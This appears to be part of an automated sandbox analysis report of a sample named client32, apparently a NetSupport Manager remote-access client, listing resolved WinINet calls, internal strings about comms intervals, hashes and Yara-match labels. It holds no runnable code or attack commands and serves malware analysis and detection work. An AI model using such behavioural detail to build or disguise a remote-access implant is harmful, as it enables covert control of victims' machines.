                                                                                                                                        • Instruction ID: 4ac117edec5f9c1d474a010583834251db26949e2589c30549bb1fc1d268093e
                                                                                                                                        • Opcode Fuzzy Hash: 79e4e4a952558211e334d2ce5679751ebcb597392141644356bbee2edc293ad9
                                                                                                                                        • Instruction Fuzzy Hash: 75F0A475A0411CABDF10EBA8DC00AFEB7B99B85208F80419DEA49A7240DB309E4587A5
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 688F4C84
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4CBD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetConnectA
                                                                                                                                        • API String ID: 199729137-3259999732
                                                                                                                                        • Opcode ID: 760807a5d0b4fac80ab8c25786a53c6f5b96b8fcbde653851536cb55ae2fdb63
                                                                                                                                        • Instruction ID: 72fa6331bee03e865b654582fce9a24961ff455fb412f3ee0f24062b02e87812
                                                                                                                                        • Opcode Fuzzy Hash: 760807a5d0b4fac80ab8c25786a53c6f5b96b8fcbde653851536cb55ae2fdb63
                                                                                                                                        • Instruction Fuzzy Hash: 49F01472614618AFCB20CF98D884E9BB3E8EB8C750F00861AF90AD3640D630E815CFA0
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 688F4E34
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4E6D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpOpenRequestA
                                                                                                                                        • API String ID: 199729137-1149044843
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68913B5E: __getptd.LIBCMT ref: 68913B64
                                                                                                                                          • Part of subcall function 68913B5E: __getptd.LIBCMT ref: 68913B74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A979
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A987
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 688F4B04
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4B31
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetOpenA
                                                                                                                                        • API String ID: 199729137-3658917949
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 688F4CE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,688FB4D8,00000000), ref: 688F4D11
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetErrorDlg
                                                                                                                                        • API String ID: 199729137-3951532234
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 688F4E94
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 688F4EC1
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpQueryInfoA
                                                                                                                                        • API String ID: 199729137-45432230
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 688F4EE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB3E2,00000000,00000000,00000000,00000000,00000000), ref: 688F4F11
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpSendRequestA
                                                                                                                                        • API String ID: 199729137-4278235638
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 688F4F34
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB614), ref: 688F4F61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpSendRequestExA
                                                                                                                                        • API String ID: 199729137-1584202490
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68906FDE
                                                                                                                                        • ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 68907018
                                                                                                                                          • Part of subcall function 689062B0: _memset.LIBCMT ref: 689062F6
                                                                                                                                          • Part of subcall function 689062B0: SetLastError.KERNEL32(00000057), ref: 689065A3
                                                                                                                                        Strings
                                                                                                                                        • API ID: _memset$ErrorLastctl_pittmanfunc
                                                                                                                                        • String ID: P
                                                                                                                                        • API String ID: 2926529296-3110715001
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC4F9
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: ID=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-586864749
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 688F4BA4
                                                                                                                                        • SetLastError.KERNEL32(00000078,000000C8,?,688FB53C,00000000,0000002B,?,?), ref: 688F4BCD
                                                                                                                                        Strings
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryOptionA
                                                                                                                                        • API String ID: 199729137-3310327128
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F4BF4
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4C1D
                                                                                                                                        Strings
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetReadFile
                                                                                                                                        • API String ID: 199729137-1824561397
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F4B54
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4B7D
                                                                                                                                        Strings
                                                                                                                                        • InternetQueryDataAvailable, xrefs: 688F4B4E
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryDataAvailable
                                                                                                                                        • API String ID: 199729137-452555236
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 688F4DE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,688F9BCE,?,?,?,?), ref: 688F4E0D
                                                                                                                                        Strings
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetWriteFile
                                                                                                                                        • API String ID: 199729137-2273844942
                                                                                                                                        • Opcode ID: 235ffbc4b6ce268548669b21bd0ee716bc105eb761056a5e3bdf554bd8ab295d
                                                                                                                                        • Instruction ID: 39e1c47cb889a03db2194c1ed8f9fc9fcb7f99bef766e265dd0834f4d7225fe5
                                                                                                                                        • Opcode Fuzzy Hash: 235ffbc4b6ce268548669b21bd0ee716bc105eb761056a5e3bdf554bd8ab295d
                                                                                                                                        • Instruction Fuzzy Hash: D2F08272614328AFC730DF95D844E5B73E8EB88760F00881AF956D7640C671EC10CFA0
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 688F4D44
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB392,00000000,0000002B,?,?), ref: 688F4D6D
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetSetOptionA
                                                                                                                                        • API String ID: 199729137-1247460590
                                                                                                                                        • Opcode ID: e186eb1667e206f8d0f61adac6b5fb00c15ac7ea7bacff02dc9707ec627f314f
                                                                                                                                        • Instruction ID: 79f51e48a5062ac51bae4a24f24477403dfdecf36dd91d215a5becd4ad0b1f12
                                                                                                                                        • Opcode Fuzzy Hash: e186eb1667e206f8d0f61adac6b5fb00c15ac7ea7bacff02dc9707ec627f314f
                                                                                                                                        • Instruction Fuzzy Hash: A1F08272605628AFC730DF94D944E5B73E8EB88B50F00481AFA5AD7641C671E810CBA0
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F6757
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        Strings
                                                                                                                                        • CONFIG_UPDATE - comms manage packet interval: %u secs, xrefs: 688F675F
                                                                                                                                        • CMPI, xrefs: 688F6740
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64strtoxl
                                                                                                                                        • String ID: CMPI$CONFIG_UPDATE - comms manage packet interval: %u secs
                                                                                                                                        • API String ID: 2058942787-1775076250
                                                                                                                                        • Opcode ID: 51c4d5af05a33c1261f2f8aa2996f571f67704f68bf720f4b1be8a4a62fa6477
                                                                                                                                        • Instruction ID: 01175e1c48092ffa18a97bed7ea8af49fa14903a3a1e895fd76c06c91da7a95a
                                                                                                                                        • Opcode Fuzzy Hash: 51c4d5af05a33c1261f2f8aa2996f571f67704f68bf720f4b1be8a4a62fa6477
                                                                                                                                        • Instruction Fuzzy Hash: D3E0D8CDD882603AF93123783C45B7B28590F637ADFC40674F956A9192F746DA5242F3
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(6893A188,00000000), ref: 688F5575
                                                                                                                                        Strings
                                                                                                                                        • NOT updating comms interval to %u secs (override: %u secs), xrefs: 688F554B
                                                                                                                                        • Updating comms interval to %u secs, xrefs: 688F555C
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                        • String ID: NOT updating comms interval to %u secs (override: %u secs)$Updating comms interval to %u secs
                                                                                                                                        • API String ID: 367298776-3363603740
                                                                                                                                        • Opcode ID: d2c50684de84f32a1d3804fa8357a494378919c93a77af6530b9fed2e4274400
                                                                                                                                        • Instruction ID: e895fc4007c78f7a95b41d774fffe513b7915a523566c538feb2858313c79811
                                                                                                                                        • Opcode Fuzzy Hash: d2c50684de84f32a1d3804fa8357a494378919c93a77af6530b9fed2e4274400
                                                                                                                                        • Instruction Fuzzy Hash: 53E09A72E41E396BDA3015DEBC08AAB3A4C8F855FAF804432FC0DA2540EA20D90182E2
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 688F4D94
                                                                                                                                        • SetLastError.KERNEL32(00000078,025E2B64,?,688FB267,00000000,688F6BD0), ref: 688F4DB5
                                                                                                                                        Strings
                                                                                                                                        • InternetSetStatusCallback, xrefs: 688F4D8E
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetSetStatusCallback
                                                                                                                                        • API String ID: 199729137-894424467
                                                                                                                                        • Opcode ID: 98c0893ab02ab27aa3e4553f1d8343399f002c8144a71dcc2bab210291a4c33f
                                                                                                                                        • Instruction ID: b02d74a2369e256e2a0aac52ecb0bf3eb32c8036bae33b1375749c865d52f5a6
                                                                                                                                        • Opcode Fuzzy Hash: 98c0893ab02ab27aa3e4553f1d8343399f002c8144a71dcc2bab210291a4c33f
                                                                                                                                        • Instruction Fuzzy Hash: 96E06532944734AFC730AF98D848A96B7F8EB54761F00482BE985D7600D671E844CBD0
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F4C44
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688FB677,?), ref: 688F4C61
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetCloseHandle
                                                                                                                                        • API String ID: 199729137-3843628324
                                                                                                                                        • Opcode ID: ea7632ad564ca91891378c1b58539588b2d12b8fcd0d86ff6e74bbf9fc0f9cbe
                                                                                                                                        • Instruction ID: b4ab81d7b9a4c495e6e017cb7ae5eafad110de4830bc14e25eff5374b86e0d44
                                                                                                                                        • Opcode Fuzzy Hash: ea7632ad564ca91891378c1b58539588b2d12b8fcd0d86ff6e74bbf9fc0f9cbe
                                                                                                                                        • Instruction Fuzzy Hash: 8BE0D8329447249FC334DFA4D848A4AB7F8EF64761F00093BE555D7501D670E884CBD0
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890DC59
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _memset.LIBCMT ref: 6890DC82
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc_memset
                                                                                                                                        • String ID: Refcount.cpp
                                                                                                                                        • API String ID: 2365696598-3480236496
                                                                                                                                        • Opcode ID: 1ed1d57a6788c9204375bfb6674e4b272274889e8fd19d4c38b6093064ea9412
                                                                                                                                        • Instruction ID: 134533825349b4f500bce97b39c41ca7445a62acfcb7cbd5bc8bd4b09a373ab0
                                                                                                                                        • Opcode Fuzzy Hash: 1ed1d57a6788c9204375bfb6674e4b272274889e8fd19d4c38b6093064ea9412
                                                                                                                                        • Instruction Fuzzy Hash: 5FE0C22BBC813837C11111EA3C06EAFBA5C8FF2DE9F850031FA0CA6241E681E95141E6
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameName::
                                                                                                                                        • String ID: {flat}
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        • m_hWnd, xrefs: 11001126
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: IsA()$NSMString.cpp
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6890DAE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event
                                                                                                                                        • String ID: Refcount.cpp$this->hReadyEvent